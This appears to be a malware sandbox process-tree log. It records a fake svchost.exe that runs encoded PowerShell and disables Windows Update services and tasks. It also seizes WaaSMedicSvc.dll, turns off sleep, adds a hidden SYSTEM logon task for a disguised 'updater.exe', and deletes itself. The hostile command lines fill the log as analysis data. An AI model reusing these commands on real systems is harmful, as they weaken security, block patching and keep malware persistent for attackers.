    cmd /c start C:\Users\Admin\AppData\Local\Temp\svchost.exe
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2164
  - - C:\Users\Admin\AppData\Local\Temp\svchost.exe
      C:\Users\Admin\AppData\Local\Temp\svchost.exe
      4⤵
      Executes dropped EXE
      PID:1056
    - - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        5⤵
        Drops file in Drivers directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3044
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        6⤵
        
        PID:2188
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        7⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1696
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        6⤵
        
        PID:1628
        
        C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:1700
        
        C:\Windows\system32\sc.exe
        
        sc stop bits
        7⤵
        Launches sc.exe
        
        PID:964
        
        C:\Windows\system32\sc.exe
        
        sc stop dosvc
        7⤵
        Launches sc.exe
        
        PID:1380
        
        C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:1548
        
        C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:2412
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        7⤵
        Launches sc.exe
        
        PID:2468
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:2308
        
        C:\Windows\system32\sc.exe
        
        sc config bits start= disabled
        7⤵
        Launches sc.exe
        
        PID:2704
        
        C:\Windows\system32\sc.exe
        
        sc failure bits reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:2960
        
        C:\Windows\system32\sc.exe
        
        sc config dosvc start= disabled
        7⤵
        Launches sc.exe
        
        PID:2364
        
        C:\Windows\system32\sc.exe
        
        sc failure dosvc reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:2608
        
        C:\Windows\system32\sc.exe
        
        sc config UsoSvc start= disabled
        7⤵
        Launches sc.exe
        
        PID:2756
        
        C:\Windows\system32\sc.exe
        
        sc failure UsoSvc reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:1552
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        7⤵
        Launches sc.exe
        
        PID:2548
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:2744
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1944
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2232
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
        7⤵
        
        PID:2208
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
        7⤵
        
        PID:1268
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
        7⤵
        
        PID:2040
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        7⤵
        
        PID:1584
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        7⤵
        
        PID:2232
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        7⤵
        
        PID:2428
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
        7⤵
        
        PID:612
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
        7⤵
        
        PID:3264
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
        7⤵
        
        PID:3428
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
        7⤵
        
        PID:3476
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
        7⤵
        
        PID:3568
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
        7⤵
        
        PID:3612
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        7⤵
        
        PID:3704
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        6⤵
        Power Settings
        
        PID:2432
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1652
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1764
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2968
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:764
      - C:\Windows\System32\conhost.exe
        
        C:\Windows\System32\conhost.exe
        6⤵
        
        PID:552
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"
        6⤵
        
        PID:2800
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2896
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"
        6⤵
        Loads dropped DLL
        
        PID:1948
        
        C:\Users\Admin\Chrome\updater.exe
        
        C:\Users\Admin\Chrome\updater.exe
        7⤵
        Executes dropped EXE
        
        PID:956
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\Chrome\updater.exe"
        8⤵
        Drops file in Drivers directory
        
        PID:3736
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        9⤵
        
        PID:1832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        10⤵
        Drops file in System32 directory
        
        PID:3876
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        9⤵
        
        PID:3964
        
        C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        10⤵
        Launches sc.exe
        
        PID:960
        
        C:\Windows\system32\sc.exe
        
        sc stop bits
        10⤵
        Launches sc.exe
        
        PID:1108
        
        C:\Windows\system32\sc.exe
        
        sc stop dosvc
        10⤵
        Launches sc.exe
        
        PID:2356
        
        C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        10⤵
        Launches sc.exe
        
        PID:896
        
        C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        10⤵
        Launches sc.exe
        
        PID:2084
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        10⤵
        Launches sc.exe
        
        PID:2932
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        10⤵
        Launches sc.exe
        
        PID:3176
        
        C:\Windows\system32\sc.exe
        
        sc config bits start= disabled
        10⤵
        Launches sc.exe
        
        PID:2228
        
        C:\Windows\system32\sc.exe
        
        sc failure bits reset= 0 actions= ""
        10⤵
        Launches sc.exe
        
        PID:3064
        
        C:\Windows\system32\sc.exe
        
        sc config dosvc start= disabled
        10⤵
        Launches sc.exe
        
        PID:2232
        
        C:\Windows\system32\sc.exe
        
        sc failure dosvc reset= 0 actions= ""
        10⤵
        Launches sc.exe
        
        PID:620
        
        C:\Windows\system32\sc.exe
        
        sc config UsoSvc start= disabled
        10⤵
        Launches sc.exe
        
        PID:2844
        
        C:\Windows\system32\sc.exe
        
        sc failure UsoSvc reset= 0 actions= ""
        10⤵
        Launches sc.exe
        
        PID:3184
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        10⤵
        Launches sc.exe
        
        PID:3196
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        10⤵
        Launches sc.exe
        
        PID:3312
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3368
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3412
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
        10⤵
        
        PID:3504
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
        10⤵
        
        PID:3584
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
        10⤵
        
        PID:3652
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        10⤵
        
        PID:2912
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        10⤵
        
        PID:2672
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        10⤵
        
        PID:2180
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
        10⤵
        
        PID:1244
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
        10⤵
        
        PID:3816
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
        10⤵
        
        PID:996
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
        10⤵
        
        PID:4076
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
        10⤵
        
        PID:4088
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
        10⤵
        
        PID:1700
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        10⤵
        
        PID:4028
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        9⤵
        Power Settings
        
        PID:2840
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        10⤵
        Power Settings
        
        PID:2160
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        10⤵
        Power Settings
        
        PID:2460
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        10⤵
        Power Settings
        
        PID:1508
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        10⤵
        Power Settings
        
        PID:3128
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        6⤵
        
        PID:2136
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        7⤵
        
        PID:1408
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c start C:\Users\Admin\AppData\Local\Temp\svchost.exe
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1524
  - - C:\Users\Admin\AppData\Local\Temp\svchost.exe
      C:\Users\Admin\AppData\Local\Temp\svchost.exe
      4⤵
      Executes dropped EXE
      PID:824
    - - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        5⤵
        Drops file in Drivers directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2912
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        6⤵
        
        PID:2256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        7⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1584
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        6⤵
        
        PID:996
        
        C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:1800
        
        C:\Windows\system32\sc.exe
        
        sc stop bits
        7⤵
        Launches sc.exe
        
        PID:2312
        
        C:\Windows\system32\sc.exe
        
        sc stop dosvc
        7⤵
        Launches sc.exe
        
        PID:1660
        
        C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:2336
        
        C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:2272
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        7⤵
        Launches sc.exe
        
        PID:2248
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:2980
        
        C:\Windows\system32\sc.exe
        
        sc config bits start= disabled
        7⤵
        Launches sc.exe
        
        PID:1524
        
        C:\Windows\system32\sc.exe
        
        sc failure bits reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:2840
        
        C:\Windows\system32\sc.exe
        
        sc config dosvc start= disabled
        7⤵
        Launches sc.exe
        
        PID:2768
        
        C:\Windows\system32\sc.exe
        
        sc failure dosvc reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:2816
        
        C:\Windows\system32\sc.exe
        
        sc config UsoSvc start= disabled
        7⤵
        Launches sc.exe
        
        PID:1732
        
        C:\Windows\system32\sc.exe
        
        sc failure UsoSvc reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:2740
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        7⤵
        Launches sc.exe
        
        PID:2920
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:1936
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2008
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1784
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
        7⤵
        
        PID:2396
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
        7⤵
        
        PID:1304
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
        7⤵
        
        PID:1016
        
